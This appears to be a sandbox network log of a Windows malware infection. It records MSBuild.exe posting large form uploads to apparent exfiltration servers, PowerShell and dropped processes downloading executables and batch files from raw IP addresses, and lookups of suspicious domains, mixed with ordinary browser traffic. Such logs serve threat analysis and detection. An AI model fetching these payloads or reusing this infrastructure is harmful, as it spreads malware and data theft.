user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i

Response

HTTP/2.0 200

cache-control: public, max-age=3600
content-length: 271
content-type: application/json; charset=utf-8
x-cache: TCP_HIT
x-frame-options: sameorigin
x-msedge-ref: Ref A: 2F5775C3D09948499B454494B8769C05 Ref B: LON04EDGE1219 Ref C: 2025-03-29T01:30:38Z
date: Sat, 29 Mar 2025 01:30:38 GMT
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----sr90rq1dtjw47yukxbi5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----uai5x4w47gv3eus0hdtj
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://176.113.115.7/mine/random.exe

powershell.exe

Remote address:

176.113.115.7:80

Request

GET /mine/random.exe HTTP/1.1
Host: 176.113.115.7
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 00:37:26 GMT
ETag: "1c3c00-63170642505d2"
Accept-Ranges: bytes
Content-Length: 1850368
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/test/am_no.bat

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /test/am_no.bat HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 03 Mar 2025 16:26:04 GMT
ETag: "7d9-62f729cd13f00"
Accept-Ranges: bytes
Content-Length: 2009
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/1781548144/2GF9eeb.bat

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/1781548144/2GF9eeb.bat HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 01:06:08 GMT
ETag: "15e268-63170cacd5481"
Accept-Ranges: bytes
Content-Length: 1434216
Content-Type: application/x-msdos-program
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ek689rqqimozm7y5x47y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

skynetxc.live

MSBuild.exe

Remote address:

8.8.8.8:53

Request

skynetxc.live

IN A

Response
DNS

byteplusx.digital

MSBuild.exe

Remote address:

8.8.8.8:53

Request

byteplusx.digital

IN A

Response
DNS

travewlio.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

travewlio.shop

IN A

Response
DNS

travewlio.shop

MSBuild.exe

Remote address:

8.8.8.8:53

Request

travewlio.shop

IN A

Response
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----68qi5phdbsjmymyu3ekf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----gvk6xt0zusr1n7yu3wt2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

pixtreev.run

MSBuild.exe

Remote address:

8.8.8.8:53

Request

pixtreev.run

IN A

Response
DNS

advennture.top

MSBuild.exe

Remote address:

8.8.8.8:53

Request

advennture.top

IN A

Response

advennture.top

IN A

104.21.25.9

advennture.top

IN A

172.67.221.138
POST

https://advennture.top/GKsiio

MSBuild.exe

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 55
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iUmh6ga2Bq4H2AZ21Of2f%2BbJm1GgHkD1HirIy8uhr0k2G4sgO1RYt5Y9qRbu5lDHR6itl3AkorQlZci2wkR4roqbEN7uHtAblmEYbrcOKkLKwYejIcn2b2DX20767u3kHw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9a8c1c87cd72-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46837&min_rtt=45095&rtt_var=12084&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=652&delivery_rate=78490&cwnd=253&unsent_bytes=0&cid=d7825d9d0e88b6e0&ts=248&x=0"
POST

https://advennture.top/GKsiio

MSBuild.exe

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Qr29fSGQ0j6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1620
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8sadWrI8wrQWVkVWOlNhPZJ3ee059NxV%2BUbJ8cKt91Heh1zpUJBXzLLcvCstdc43%2By55zsOma45xvN%2FUibhxjPUq4ykrtw0joyhqGE8JgCUxNQePr%2F1lKJsy0wufaxCvg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9a90898bcd72-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46442&min_rtt=43643&rtt_var=9853&sent=10&recv=11&lost=0&retrans=0&sent_bytes=4239&recv_bytes=2605&delivery_rate=78490&cwnd=255&unsent_bytes=0&cid=d7825d9d0e88b6e0&ts=897&x=0"
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----fk68qq16fusriect0zmg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://advennture.top/GKsiio

MSBuild.exe

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=b3dMWKz7YIl0M6x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1070
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qKikTumUy3kG%2Fl2D3Xfku50t7SQyk%2BHCED729Awqs9eZLbMLI6KIjudmGRBdZLqdBOlTTG7P4x7EetUl46xX6KcOYWV%2FAFuVT0BN92oC1LsG73nMXijVzLZA7nAZatQ6A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9a93cbf2bebf-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=44934&min_rtt=43420&rtt_var=10288&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=1681&delivery_rate=92014&cwnd=253&unsent_bytes=0&cid=a5c9aa4c37bcfb4e&ts=230&x=0"
GET

http://77.90.153.244/v7942.exe

futors.exe

Remote address:

77.90.153.244:80

Request

GET /v7942.exe HTTP/1.1
Host: 77.90.153.244

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:45 GMT
Content-Type: application/octet-stream
Content-Length: 649216
Last-Modified: Fri, 28 Mar 2025 20:46:21 GMT
Connection: keep-alive
ETag: "67e70a9d-9e800"
Accept-Ranges: bytes
POST

https://advennture.top/GKsiio

MSBuild.exe

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 93
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 927b9a967fbc35bc-LHR
alt-svc: h3=":443"; ma=86400
GET

http://176.113.115.7/mine/random.exe

Remote address:

176.113.115.7:80

Request

GET /mine/random.exe HTTP/1.1
Host: 176.113.115.7
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 00:37:26 GMT
ETag: "1c3c00-63170642505d2"
Accept-Ranges: bytes
Content-Length: 1850368
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

cosmosyf.top

Remote address:

8.8.8.8:53

Request

cosmosyf.top

IN A

Response

cosmosyf.top

IN A

104.21.32.1

cosmosyf.top

IN A

104.21.16.1

cosmosyf.top

IN A

104.21.96.1

cosmosyf.top

IN A

104.21.48.1

cosmosyf.top

IN A

104.21.64.1

cosmosyf.top

IN A

104.21.112.1

cosmosyf.top

IN A

104.21.80.1
GET

http://185.7.214.51:9080/Bell_Setup16

Remote address:

185.7.214.51:9080

Request

GET /Bell_Setup16 HTTP/1.1
Host: 185.7.214.51:9080

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:55 GMT
Server: Apache/2.4.37 (AlmaLinux)
Last-Modified: Mon, 06 Feb 2006 02:37:06 GMT
ETag: "203552-40c17237cb880"
Accept-Ranges: bytes
Content-Length: 2110802
DNS

goku92ad.zapto.org

Remote address:

8.8.8.8:53

Request

goku92ad.zapto.org

IN A

Response

goku92ad.zapto.org

IN A

176.160.157.96
DNS

ipwho.is

Remote address:

8.8.8.8:53

Request

ipwho.is

IN A

Response

ipwho.is

IN A

195.201.57.90
DNS

wxayfarer.live

MSBuild.exe

Remote address:

8.8.8.8:53

Request

wxayfarer.live

IN A

Response
GET

http://2.59.41.142:8080/bot.exe

Remote address:

2.59.41.142:8080

Request

GET /bot.exe HTTP/1.1
Host: 2.59.41.142:8080

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Disposition: attachment; filename=bot.exe
Content-Length: 7931968
Content-Type: application/octet-stream
Last-Modified: Sat, 29 Mar 2025 01:30:56 GMT
Date: Sat, 29 Mar 2025 01:31:01 GMT
DNS

play.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.169.46
DNS

galarona.bet

Rm3cVPI.exe

Remote address:

8.8.8.8:53

Request

galarona.bet

IN A

Response
GET

http://176.113.115.7/files/5163778194/7IIl2eE.exe

Remote address:

176.113.115.7:80

Request

GET /files/5163778194/7IIl2eE.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 03:27:42 GMT
ETag: "1290e9-631366b83351c"
Accept-Ranges: bytes
Content-Length: 1216745
Content-Type: application/x-msdos-program
DNS

edge.microsoft.com

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN A

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net

ax-0002.ax-msedge.net

IN A

150.171.27.11

ax-0002.ax-msedge.net

IN A

150.171.28.11
DNS

edge.microsoft.com

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN Unknown

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net
DNS

ntp.msn.com

Remote address:

8.8.8.8:53

Request

ntp.msn.com

IN A

Response

ntp.msn.com

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net

a-0003.a-msedge.net

IN A

204.79.197.203
DNS

ntp.msn.com

Remote address:

8.8.8.8:53

Request

ntp.msn.com

IN Unknown

Response

ntp.msn.com

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net
DNS

edge.microsoft.com

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN A

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net

ax-0002.ax-msedge.net

IN A

150.171.28.11

ax-0002.ax-msedge.net

IN A

150.171.27.11
DNS

edge.microsoft.com

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN Unknown

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

172.217.16.238
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN Unknown

Response

clients2.google.com

IN CNAME

clients.l.google.com
GET

http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:_mA7FwXY-53SkK7wPwpcLI65BW-vij58fuzibcLq1l8&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Remote address:

150.171.27.11:80

Request

GET /browsernetworktime/time/1/current?cup2key=2:_mA7FwXY-53SkK7wPwpcLI65BW-vij58fuzibcLq1l8&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 HTTP/1.1
Host: edge.microsoft.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Sec-Mesh-Client-Edge-Version: 133.0.3065.69
Sec-Mesh-Client-Edge-Channel: stable
Sec-Mesh-Client-OS: Windows
Sec-Mesh-Client-OS-Version: 10.0.19041
Sec-Mesh-Client-Arch: x86_64
Sec-Mesh-Client-WebView: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 101
Content-Type: application/json
Content-Encoding: gzip
Expires: Mon, 01 Jan 1990 00:00:00 GMT
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
x-cup-server-proof: 30440220114FF519C9A279C342728040B1E4AF214FA2D658DBC1CE480230445A068A4DBF02204A287E9BF864A5E7112002E209676277CEE8C224BAA193E366C8E158112938E1:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Content-Disposition: attachment; filename='json.txt'
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: A27AE0AB397E4725BFDB9B930C795EA6 Ref B: LON04EDGE1221 Ref C: 2025-03-29T01:31:11Z
Date: Sat, 29 Mar 2025 01:31:11 GMT
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.1
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN Unknown

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com
DNS

copilot.microsoft.com

Remote address:

8.8.8.8:53

Request

copilot.microsoft.com

IN A

Response

copilot.microsoft.com

IN CNAME

copilot-copilot-msft-com.trafficmanager.net

copilot-copilot-msft-com.trafficmanager.net

IN CNAME

copilot.microsoft.com.edgekey.net

copilot.microsoft.com.edgekey.net

IN CNAME

e107108.dscx.akamaiedge.net

e107108.dscx.akamaiedge.net

IN A

95.101.143.218

e107108.dscx.akamaiedge.net

IN A

88.221.135.26
DNS

copilot.microsoft.com

Remote address:

8.8.8.8:53

Request

copilot.microsoft.com

IN Unknown

Response

copilot.microsoft.com

IN CNAME

copilot-copilot-msft-com.trafficmanager.net

copilot-copilot-msft-com.trafficmanager.net

IN CNAME

copilot.microsoft.com.edgekey.net

copilot.microsoft.com.edgekey.net

IN CNAME

e107108.dscx.akamaiedge.net
DNS

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

Remote address:

8.8.8.8:53

Request

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN A

Response

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN CNAME

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

IN CNAME

cdp-f-ssl-tlu-net.trafficmanager.net

cdp-f-ssl-tlu-net.trafficmanager.net

IN CNAME

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

IN CNAME

a2033.dscd.akamai.net

a2033.dscd.akamai.net

IN A

2.18.190.174

a2033.dscd.akamai.net

IN A

2.18.190.170
DNS

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

Remote address:

8.8.8.8:53

Request

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN Unknown

Response

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN CNAME

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

IN CNAME

cdp-f-ssl-tlu-net.trafficmanager.net

cdp-f-ssl-tlu-net.trafficmanager.net

IN CNAME

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

IN CNAME

a2033.dscd.akamai.net
DNS

img-s-msn-com.akamaized.net

Remote address:

8.8.8.8:53

Request

img-s-msn-com.akamaized.net

IN A

Response

img-s-msn-com.akamaized.net

IN CNAME

a1834.dscg2.akamai.net

a1834.dscg2.akamai.net

IN A

2.19.252.154

a1834.dscg2.akamai.net

IN A

2.19.252.151
DNS

img-s-msn-com.akamaized.net

Remote address:

8.8.8.8:53

Request

img-s-msn-com.akamaized.net

IN Unknown

Response

img-s-msn-com.akamaized.net

IN CNAME

a1834.dscg2.akamai.net
DNS

sb.scorecardresearch.com

Remote address:

8.8.8.8:53

Request

sb.scorecardresearch.com

IN A

Response

sb.scorecardresearch.com

IN A

52.85.92.105

sb.scorecardresearch.com

IN A

52.85.92.87

sb.scorecardresearch.com

IN A

52.85.92.116

sb.scorecardresearch.com

IN A

52.85.92.104
DNS

sb.scorecardresearch.com

Remote address:

8.8.8.8:53

Request

sb.scorecardresearch.com

IN Unknown

Response
DNS

th.bing.com

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

95.101.143.201

e86303.dscx.akamaiedge.net

IN A

88.221.135.34

e86303.dscx.akamaiedge.net

IN A

95.101.143.202

e86303.dscx.akamaiedge.net

IN A

88.221.135.27

e86303.dscx.akamaiedge.net

IN A

88.221.135.25

e86303.dscx.akamaiedge.net

IN A

88.221.135.33
DNS

th.bing.com

Remote address:

8.8.8.8:53

Request

th.bing.com

IN Unknown

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net
DNS

c.msn.com

Remote address:

8.8.8.8:53

Request

c.msn.com

IN A

Response

c.msn.com

IN CNAME

c-msn-pme.trafficmanager.net

c-msn-pme.trafficmanager.net

IN A

13.74.129.1
DNS

c.msn.com

Remote address:

8.8.8.8:53

Request

c.msn.com

IN Unknown

Response

c.msn.com

IN CNAME

c-msn-pme.trafficmanager.net
DNS

c.bing.com

Remote address:

8.8.8.8:53

Request

c.bing.com

IN A

Response

c.bing.com

IN CNAME

c-bing-com.ax-0001.ax-msedge.net

c-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
DNS

c.bing.com

Remote address:

8.8.8.8:53

Request

c.bing.com

IN Unknown

Response

c.bing.com

IN CNAME

c-bing-com.ax-0001.ax-msedge.net

c-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net
DNS

assets.msn.com

Remote address:

8.8.8.8:53

Request

assets.msn.com

IN A

Response

assets.msn.com

IN CNAME

assets.msn.com.edgesuite.net

assets.msn.com.edgesuite.net

IN CNAME

a233.dscd.akamai.net

a233.dscd.akamai.net

IN A

2.18.190.99

a233.dscd.akamai.net

IN A

2.18.190.182
DNS

assets.msn.com

Remote address:

8.8.8.8:53

Request

assets.msn.com

IN Unknown

Response

assets.msn.com

IN CNAME

assets.msn.com.edgesuite.net

assets.msn.com.edgesuite.net

IN CNAME

a233.dscd.akamai.net
DNS

browser.events.data.msn.com

Remote address:

8.8.8.8:53

Request

browser.events.data.msn.com

IN A

Response

browser.events.data.msn.com

IN CNAME

global.asimov.events.data.trafficmanager.net

global.asimov.events.data.trafficmanager.net

IN CNAME

onedscolprdeus21.eastus.cloudapp.azure.com

onedscolprdeus21.eastus.cloudapp.azure.com

IN A

20.42.73.31
DNS

browser.events.data.msn.com

Remote address:

8.8.8.8:53

Request

browser.events.data.msn.com

IN Unknown

Response

browser.events.data.msn.com

IN CNAME

global.asimov.events.data.trafficmanager.net

global.asimov.events.data.trafficmanager.net

IN CNAME

onedscolprdgwc04.germanywestcentral.cloudapp.azure.com
DNS

srtb.msn.com

Remote address:

8.8.8.8:53

Request

srtb.msn.com

IN A

Response

srtb.msn.com

IN CNAME

srtb-msn-com-profile.trafficmanager.net

srtb-msn-com-profile.trafficmanager.net

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net

a-0003.a-msedge.net

IN A

204.79.197.203
DNS

srtb.msn.com

Remote address:

8.8.8.8:53

Request

srtb.msn.com

IN Unknown

Response

srtb.msn.com

IN CNAME

srtb-msn-com-profile.trafficmanager.net

srtb-msn-com-profile.trafficmanager.net

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net
DNS

r.bing.com

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

95.101.143.201

e86303.dscx.akamaiedge.net

IN A

88.221.135.27

e86303.dscx.akamaiedge.net

IN A

88.221.135.33

e86303.dscx.akamaiedge.net

IN A

88.221.135.25

e86303.dscx.akamaiedge.net

IN A

95.101.143.202

e86303.dscx.akamaiedge.net

IN A

88.221.135.34
DNS

r.bing.com

Remote address:

8.8.8.8:53

Request

r.bing.com

IN Unknown

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net
DNS

r.msftstatic.com

Remote address:

8.8.8.8:53

Request

r.msftstatic.com

IN A

Response

r.msftstatic.com

IN CNAME

r-msftstatic-com.a-0016.a-msedge.net

r-msftstatic-com.a-0016.a-msedge.net

IN CNAME

a-0016.a-msedge.net

a-0016.a-msedge.net

IN A

204.79.197.219
DNS

r.msftstatic.com

Remote address:

8.8.8.8:53

Request

r.msftstatic.com

IN Unknown

Response

r.msftstatic.com

IN CNAME

r-msftstatic-com.a-0016.a-msedge.net
GET

http://176.113.115.7/files/martin2/random.exe

Remote address:

176.113.115.7:80

Request

GET /files/martin2/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 23:59:07 GMT
ETag: "464200-6316fdb1dbc0a"
Accept-Ranges: bytes
Content-Length: 4604416
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/unique2/random.exe

Remote address:

176.113.115.7:80

Request

GET /files/unique2/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 01:15:15 GMT
ETag: "483400-63170eb66e708"
Accept-Ranges: bytes
Content-Length: 4731904
Content-Type: application/x-msdos-program
GET

http://107.174.192.179/app/u75a1_003.exe

Remote address:

107.174.192.179:80

Request

GET /app/u75a1_003.exe HTTP/1.1
Host: 107.174.192.179

Response

HTTP/1.1 200 OK

Server: nginx/1.22.1
Date: Sat, 29 Mar 2025 01:31:17 GMT
Content-Type: application/octet-stream
Content-Length: 1313792
